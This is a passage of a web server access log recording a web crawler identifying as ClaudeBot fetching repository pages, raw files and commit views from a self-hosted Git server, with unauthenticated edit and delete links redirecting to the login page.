[Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/claude.md?display=source" [Client 216.73.216.188] [Length 15372] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/assets/js/i18n.js" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/assets/js/i18n.js" -[15/Feb/2026:13:17:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/MIGRATION_GUIDE.md?display=rendered" [Client 216.73.216.188] [Length 15809] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py.claude" [Client 216.73.216.188] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py.claude" [Client 216.73.216.188] [Length 5547] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/services" [Client 216.73.216.188] [Length 9920] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.html?display=rendered" [Client 216.73.216.188] [Length 10922] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/tsconfig.json" [Client 216.73.216.188] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker" [Client 216.73.216.188] [Length 9906] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/QUICKSTART.md" [Client 216.73.216.188] [Length 9932] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/README.md" [Client 216.73.216.188] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/README.md?display=source" [Client 216.73.216.188] [Length 11757] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/pages" [Client 216.73.216.188] [Length 9896] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/QUICKSTART.md" [Client 216.73.216.188] [Length 2208] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/App.tsx?display=source" [Client 216.73.216.188] [Length 12765] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fcommit%2F1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa%2F.gitignore" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Header.tsx" [Client 216.73.216.188] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.tsx" [Client 216.73.216.188] [Length 9861] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/package.json?display=source" [Client 216.73.216.188] [Length 11718] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/services/geminiService.ts?display=source" [Client 216.73.216.188] [Length 13159] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2Fhtml%2Fservices" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2Fhtml%2Fmetadata.json" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/templates/index.html?display=source" [Client 216.73.216.188] [Length 15748] [Gzip 5.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fcommit%2F1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa%2F.TemporaryDocument" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/.gitignore" [Client 216.73.216.188] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/package.json" [Client 216.73.216.188] [Length 9872] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2Fhtml%2Fassets%2Fcss" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 15578] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/1.conf?display=source" [Client 216.73.216.188] [Length 13225] [Gzip 4.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/package.json" [Client 216.73.216.188] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/services/geminiService.ts" [Client 216.73.216.188] [Length 13172] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.tsx" [Client 216.73.216.188] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.gitignore?display=source" [Client 216.73.216.188] [Length 11118] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html" [Client 216.73.216.188] [Length 14226] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/ChatBot.tsx?display=source" [Client 216.73.216.188] [Length 15564] [Gzip 4.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components" [Client 216.73.216.188] [Length 9880] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm" [Client 216.73.216.188] [Length 10159] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2Fhtml%2Fpackage.json" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/.gitignore?display=source" [Client 216.73.216.188] [Length 11472] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Header.tsx?display=source" [Client 216.73.216.188] [Length 14827] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/css/style.css" [Client 216.73.216.188] [Length 10119] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2Fhtml%2Fcomponents" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.gitignore" [Client 216.73.216.188] [Length 12198] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Header.tsx" [Client 216.73.216.188] [Length 14845] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 9791] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/nginx" [Client 216.73.216.188] [Length 10043] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.tsx?display=source" [Client 216.73.216.188] [Length 11623] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/css/style.css" [Client 216.73.216.188] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/package.json?display=source" [Client 216.73.216.188] [Length 11715] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/services/geminiService.ts" [Client 216.73.216.188] [Length 13174] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/claude.md?display=rendered" [Client 216.73.216.188] [Length 13440] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/components/Contact.tsx" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm" [Client 216.73.216.188] [Length 10163] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/components/About.tsx" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/components/Contact.tsx" -[15/Feb/2026:13:17:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/css/style.css?display=source" [Client 216.73.216.188] [Length 13138] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/components/About.tsx" -[15/Feb/2026:13:17:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/requirements.txt" [Client 216.73.216.188] [Length 11349] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 15578] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/css" [Client 216.73.216.188] [Length 10109] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2Fobj%2FDebug" [Client 216.73.216.188] [Length 25607] [Gzip 5.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/README.md?display=rendered" [Client 216.73.216.188] [Length 11317] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/components/Contact.tsx" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:17:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/components/Contact.tsx" -[15/Feb/2026:13:17:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker%2Fstatic%2Fcss%2Fstyle.css" [Client 216.73.216.188] [Length 60990] [Gzip 11.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2Fhtml%2Fmetadata.json" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fhtml%2Fcomponents" [Client 